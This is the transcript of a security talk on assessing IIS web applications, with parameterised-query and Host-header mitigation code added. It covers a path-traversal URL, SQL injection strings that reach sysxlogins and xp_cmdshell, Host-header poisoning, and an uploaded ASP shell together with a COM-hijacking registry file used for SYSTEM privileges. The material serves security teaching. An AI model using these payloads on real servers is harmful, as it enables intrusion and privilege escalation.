Application Assessments on IIS

Posted 08-Jan-2016 (PowerPoint presentation)

TRANSCRIPT

Page 1: Application Assessments on IIS

Application Assessments on IIS

Page 2: Application Assessments on IIS

Welcome!

David Litchfield

([email protected])

Page 3: Application Assessments on IIS

What is an Application Assessment?

Part of a network vulnerability assessment

Application provides the site functionality

Application is least tested but often proves to be the greatest risk

Page 4: Application Assessments on IIS

Vulnerability Scanners

• Cybercop

• I. S. S.

• Cerberus Internet Scanner

Page 5: Application Assessments on IIS

What scanners do do

They highlight known vulnerabilities in COTS products

Webhits.dll and null.htw

MSADC and RDS

Ism.dll and .htr overflow

%C0%AF UNICODE issue

Page 6: Application Assessments on IIS

What scanners don’t do

They won’t assess your application

Page 7: Application Assessments on IIS
Page 8: Application Assessments on IIS

Assessing the Application

What services does the site offer?

What functionality exists to provide these services?

What drives this functionality?

How does it do this?

Page 9: Application Assessments on IIS

Stocks-r-us.com

• Free charting service of current/real-time market trends

• A subscriber service providing detailed market analysis

• An “I’ve forgotten my password” service

• A contact service

• An online service to apply for a job with stocks-r-us.com

Page 10: Application Assessments on IIS

Free charting service of current/real-time market trends

• From a web form a user chooses the stock market

• They also choose a time range

• On submitting, a page called read_img.asp returns a graph of the ups and downs of the market:

http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png

http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=

Page 11: Application Assessments on IIS

Exception Handling

ASP Error 800814:

Create object failed in /includes/olectra.inc

Downloading the .inc file reveals nothing, but there are two issues here: bad exception handling, and the .inc extension has not been mapped to asp.dll.

A search on Google reveals Olectra Chart

Page 12: Application Assessments on IIS

Source code revelation!

Olectra creates a virtual directory called /octemp

When a graph or chart is produced a temp directory is created in the /octemp directory. This directory’s name is a number like “00000008”

The dynamically produced graph is a random string of letters such as “AXYZPQ” and has a file extension of .png

/read_img.asp?IDN=../&IFN=read_img&IFE=asp

Page 13: Application Assessments on IIS

SQL Queries

strSQL = "select price from stocks where name = '" _
    & request.querystring("company") & "'"

This code is insecure!!!

Why?

Page 14: Application Assessments on IIS

By setting the “company” parameter to something such as:

ISSX' select * from master..sysxlogins

Would execute the two queries in batch mode:

Select price from stocks where name= 'ISSX' Select * from master..sysxlogins

'sa' login on MS SQL Server

xp_cmdshell extended stored procedure

Page 15: Application Assessments on IIS

On its own, ASP will not escape a single quote mark ('); .idc files will.

Change every single quote provided in a parameter to 0x27 or strip them out

Page 16: Application Assessments on IIS

Consideration for integer input

strSQL = "Select company from stocks where price > " & request.querystring("price")

Again we can insert an arbitrary SQL query here and have it execute.

Page 17: Application Assessments on IIS

Verifying numeric input

IsNumeric() for VBScript

isNaN() for JScript
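As an added example that is not part of the talk, here are the lookups from pages 13 and 16 rewritten in classic ASP so that the "company" and "price" values travel as bound ADO parameters and the price is checked with IsNumeric() first; the connection string, the stocks(name, price) table and the helper names are assumptions.

```vbscript
<%
' Added example (not from the talk): the lookups from pages 13 and 16 with
' the client values bound as parameters instead of pasted into the SQL text.
' Assumed: a table stocks(name, price) reachable over ADO via CONN_STR.
Option Explicit
Dim CONN_STR
CONN_STR = "Provider=SQLOLEDB;Data Source=(local);Initial Catalog=stocks;Integrated Security=SSPI"
Const adCmdText = 1      ' ADO constants spelled out so adovbs.inc is not needed
Const adParamInput = 1
Const adVarChar = 200
Const adDouble = 5

' Run a one-parameter query; return the first column of the first row, or
' Null when nothing matched. The value reaches SQL Server as data only.
Function QueryOne(ByVal sql, ByVal paramType, ByVal paramSize, ByVal value)
    Dim conn, cmd, rs
    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open CONN_STR
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = sql
    cmd.Parameters.Append cmd.CreateParameter("p1", paramType, adParamInput, paramSize, value)
    Set rs = cmd.Execute
    If rs.EOF Then QueryOne = Null Else QueryOne = rs.Fields(0).Value
    rs.Close
    conn.Close
End Function

' Page 13: a quote inside "company" no longer ends the string literal, so the
' batch shown on page 14 is just a name that matches nothing.
Function GetPrice(ByVal company)
    If Len(company) = 0 Or Len(company) > 64 Then
        GetPrice = Null
    Else
        GetPrice = QueryOne("SELECT price FROM stocks WHERE name = ?", adVarChar, 64, company)
    End If
End Function

' Page 16: IsNumeric() turns away SQL text and CDbl() hands the driver a real
' number, so "price" can never widen the query.
Function CountAbove(ByVal priceText)
    If Not IsNumeric(priceText) Then
        CountAbove = Null
    Else
        CountAbove = QueryOne("SELECT COUNT(*) FROM stocks WHERE price > ?", adDouble, 0, CDbl(priceText))
    End If
End Function
' Usage: price = GetPrice(Request.QueryString("company")); Null means no match.
%>
```

Note that IsNumeric() also accepts forms such as "1e3" or " 42 ", which CDbl() normalises to a number; what matters is that no string ever reaches the SQL text.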

Page 18: Application Assessments on IIS

r.f.p – Rain Forest Puppy

http://www.wiretrip.net/rfp

Page 19: Application Assessments on IIS

Contact Service

<%
..
Set SMTPObj = GetObject("IIS://" & request.servervariables("SERVER_NAME") & "/SMTPSVC")
..
%>

Page 20: Application Assessments on IIS

HTTP SERVER_NAME Poisoning

“Host:” HTTP Client Header field

• Learn the password hash for the IWAM account

• Enumerate SQL servers

• Proxy attacks

• Samples on IIS

• ADSI, Corba and COM
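An added example, not from the talk, of how the contact service on page 19 can drop the SERVER_NAME dependency: the ADSI path names the local machine directly, and the incoming Host header is checked against an allowlist before the page does any work. The two host names and the IsTrustedHost helper are assumptions.

```vbscript
<%
' Added example (not from the talk): the contact service of page 19 without
' the SERVER_NAME dependency. SERVER_NAME is derived from the client's Host:
' header, so it is treated as untrusted input here.
' Assumed: the site answers only for the two host names listed below.
Option Explicit

' True only when the Host header (port stripped, case folded) is one we serve.
Function IsTrustedHost(ByVal hostHeader)
    Dim allowed, h, i
    allowed = Array("www.stocks-r-us.com", "stocks-r-us.com")
    h = LCase(Trim(hostHeader))
    If InStr(h, ":") > 0 Then h = Left(h, InStr(h, ":") - 1)
    IsTrustedHost = False
    For i = 0 To UBound(allowed)
        If h = allowed(i) Then IsTrustedHost = True
    Next
End Function

' Refuse requests whose Host header is not one of ours before touching ADSI.
If Not IsTrustedHost(Request.ServerVariables("HTTP_HOST")) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Dim SMTPObj
' "localhost" is a constant, so nothing the client sends reaches the ADSI path.
Set SMTPObj = GetObject("IIS://localhost/SMTPSVC")
%>
```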

Page 21: Application Assessments on IIS

On-line job application service

As part of this service stocks-r-us.com allows uploading of curricula vitae / resumes

Client Side checking doesn’t work

Scripting enabled on the /cvtemp virtual directory

Page 22: Application Assessments on IIS

Gaining SYSTEM Privileges using ASP

• IIS Security Model

• IUSR and IWAM accounts

Page 23: Application Assessments on IIS

Wscript.Shell Object

Set WSObj = CreateObject("wscript.shell")

• Read from the Registry

• Write to the Registry

• Execute commands

Page 24: Application Assessments on IIS

<%
Dim WshShell, strCMD, result
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>

MSI.ASP

Page 25: Application Assessments on IIS

REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"

MSI.REG

Page 26: Application Assessments on IIS

Summary

• Understand the technology you’re dealing with

• Never trust user input – anywhere

• Ensure permissions are set properly

• Don’t trust third-party software until truly evaluated

• Don’t rely on client side checking

• Scanners won’t find these problems – you will

Page 27: Application Assessments on IIS

Questions?

Page 28: Application Assessments on IIS

Thanks and enjoy the rest of the day!